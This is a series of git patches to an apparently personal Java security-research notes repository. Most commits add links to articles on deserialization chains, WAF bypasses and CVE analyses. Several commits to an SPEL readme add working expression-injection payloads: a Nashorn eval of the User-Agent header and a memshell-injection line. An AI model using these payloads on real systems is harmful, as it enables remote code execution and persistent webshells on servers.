-149,3 +149,4 @@ + 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) + 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** + 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** ++ 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** From 0d0387308e0654181dad0fc745a47270c051b96e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 22 Aug 2022 15:01:15 +0800 Subject: [PATCH 107/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 675c06c..43d561b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -150,3 +150,4 @@ + 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** + 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** + 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** ++ 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** From e60dddad0ab644b13234f3ecb11bf41d840dcee8 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 1 Sep 2022 16:54:36 +0800 Subject: [PATCH 108/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 43d561b..17bc0da 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -151,3 +151,4 @@ + 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** + 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** + 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** ++ 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** From d81bc7d9f602bc8a0dae54484812397d93521ea0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 2 Sep 2022 17:25:55 +0800 Subject: [PATCH 109/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 17bc0da..a2df6be 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -152,3 +152,4 @@ + 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** + 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** + 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** ++ 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** From 3ad5b0c446a9c11ad2b43d161f07958db950d625 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 10 Sep 2022 00:07:27 +0800 Subject: [PATCH 110/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a2df6be..a1a5905 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -153,3 +153,4 @@ + 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** + 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** + 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** ++ 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** From a2e3591d7a3c6462fb2bec06c45ab15d71eefaa4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 10 Sep 2022 23:37:20 +0800 Subject: [PATCH 111/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a1a5905..74e5f5e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -154,3 +154,4 @@ + 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** + 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** + 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** ++ 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** From 4d2bd5b6a7f5249428a5e40916489669e9a34c36 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 11 Sep 2022 10:56:24 +0800 Subject: [PATCH 112/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 74e5f5e..28e3f61 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -155,3 +155,4 @@ + 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** + 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** + 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** ++ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) From c7d87f5c8612076aa446c176d4fdb206cfa92882 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 15 Sep 2022 20:51:20 +0800 Subject: [PATCH 113/332] Create Readme.md --- Undertow/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 Undertow/Readme.md diff --git a/Undertow/Readme.md b/Undertow/Readme.md new file mode 100644 index 0000000..16d8a83 --- /dev/null +++ b/Undertow/Readme.md @@ -0,0 +1,5 @@ +# Undertow + +https://blog.csdn.net/hollis_chuang/article/details/104470945 + +http://blog.hubwiz.com/2016/12/01/webserver-Undertow/ From b63b51024c3f51494e8d85f269904f4ae037e6be Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 13:35:31 +0800 Subject: [PATCH 114/332] Update Readme.md --- shell/SPEL/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index c83f309..2e57962 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md @@ -1,5 +1,7 @@ # SPEL +>new关键字大小写可以绕过 + ## poc ```java @@ -45,6 +47,7 @@ T(org.springframework.cglib.core.ReflectUtils).defineClass('Singleton',T(com.sun #{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()} +${''.getClass().forName('java.script.ScriptEngineManager').newInstance().getEngineByName("nashorn").eval(#request.getHeader('User-Agent'))} echo From aff8eaec8c511a05428772a3ea5701e0e3280d80 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 17:10:08 +0800 Subject: [PATCH 115/332] Update Readme.md --- shell/SPEL/Readme.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 2e57962..b0acffd 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md @@ -111,7 +111,8 @@ print(')}') 其他bypass: https://xz.aliyun.com/t/9245 ## 参考 - +> https://xz.aliyun.com/t/9245 **可以使用#request.getRequestedSessionId() 或者 #request.getHeader('User-Agent') 反正可以使用request对象或者respose** +> >https://www.cnblogs.com/bitterz/p/15206255.html > >https://landgrey.me/blog/15/ From c337e11d2e0c3cb385652b8ee7fc35aefe7916af Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 20:50:14 +0800 Subject: [PATCH 116/332] Create jetty --- jetty | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 jetty diff --git a/jetty b/jetty new file mode 100644 index 0000000..aefe916 --- /dev/null +++ b/jetty @@ -0,0 +1,5 @@ +# jetty + +比较好的文章 + +https://swarm.ptsecurity.com/tag/web-application-security/ From d160b9a1e472c722fb846f0c600ad772c9127601 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 20:50:54 +0800 Subject: [PATCH 117/332] Delete jetty --- jetty | 5 ----- 1 file changed, 5 deletions(-) delete mode 100644 jetty diff --git a/jetty b/jetty deleted file mode 100644 index aefe916..0000000 --- a/jetty +++ /dev/null @@ -1,5 +0,0 @@ -# jetty - -比较好的文章 - -https://swarm.ptsecurity.com/tag/web-application-security/ From cca34aa995753884be80e17f29e1c4cabec07f9d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 20:51:25 +0800 Subject: [PATCH 118/332] Create Readme.md --- Jetty/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 Jetty/Readme.md diff --git a/Jetty/Readme.md b/Jetty/Readme.md new file mode 100644 index 0000000..c036d30 --- /dev/null +++ b/Jetty/Readme.md @@ -0,0 +1,5 @@ +# Jetty + +好文章: + +https://swarm.ptsecurity.com/tag/web-application-security/ From cb7c7d5c7e9159c1e4979bb589bd9df5447430b3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 21:11:04 +0800 Subject: [PATCH 119/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 28e3f61..2243d30 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -155,4 +155,5 @@ + 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** + 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** + 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** -+ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) ++ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) ++ 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** From 312f9323aa901d1543bd57e43078170e44420cf0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Sep 2022 23:36:50 +0800 Subject: [PATCH 120/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2243d30..add100f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -157,3 +157,4 @@ + 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** + 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) + 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** ++ 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) From 48ee10b76006bf6a2d01b6ab7242525ed0d92933 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 19 Sep 2022 00:21:26 +0800 Subject: [PATCH 121/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index add100f..6ac687a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -158,3 +158,4 @@ + 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) + 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** + 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) ++ 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) From 5e790ec8cb65a3cae8b3bdfc0f2c3ca05355558f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 20 Sep 2022 21:14:05 +0800 Subject: [PATCH 122/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6ac687a..25d842d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -159,3 +159,4 @@ + 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** + 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) + 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) ++ 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** From bf60900e50187054bbc1e75c4a7cfd49a3d84dcf Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 23 Sep 2022 14:49:19 +0800 Subject: [PATCH 123/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 25d842d..0b18a57 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -160,3 +160,4 @@ + 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) + 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) + 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** ++ 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** From 69cdaa189e2a401161c90c2efedf7332f94063fe Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 23 Sep 2022 23:55:38 +0800 Subject: [PATCH 124/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0b18a57..7c01619 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -161,3 +161,4 @@ + 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) + 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** + 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** ++ 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** From 92683e32d154813cc5b117fd4e73d8533c292f82 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Sep 2022 13:22:52 +0800 Subject: [PATCH 125/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7c01619..4b5decd 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -162,3 +162,4 @@ + 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** + 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** + 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** ++ 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** From 7bcef03b26b097d9127ca1c30aad7bcb92ea5f2d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Sep 2022 21:43:07 +0800 Subject: [PATCH 126/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4b5decd..0472cfa 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -163,3 +163,4 @@ + 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** + 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** + 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** ++ 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** From 4e56cffcd809587ee0af6bef615538f7ae9c04ea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Sep 2022 21:52:27 +0800 Subject: [PATCH 127/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0472cfa..83b5ca2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -164,3 +164,4 @@ + 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** + 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** + 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** ++ 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** From e0008a4e09a2b796f8e8a80c8cc61e0a63743879 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 29 Sep 2022 14:24:29 +0800 Subject: [PATCH 128/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 83b5ca2..bfcb129 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -165,3 +165,4 @@ + 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** + 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** + 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** ++ 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html) From f68e12bfebc19e66aa810baddf4b01c788f00334 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 29 Sep 2022 16:43:40 +0800 Subject: [PATCH 129/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bfcb129..2bec876 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -166,3 +166,4 @@ + 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** + 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** + 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html) ++ 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** From df9e765c02fd05924778fa091965a139e8dfa2d6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 4 Oct 2022 18:18:28 +0800 Subject: [PATCH 130/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2bec876..61e5771 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -167,3 +167,4 @@ + 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** + 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html) + 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** ++ 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** From f22f680cf2aee58989104c6b2d2c4615e6475e21 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 5 Oct 2022 17:10:29 +0800 Subject: [PATCH 131/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 61e5771..50449d7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -168,3 +168,4 @@ + 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia 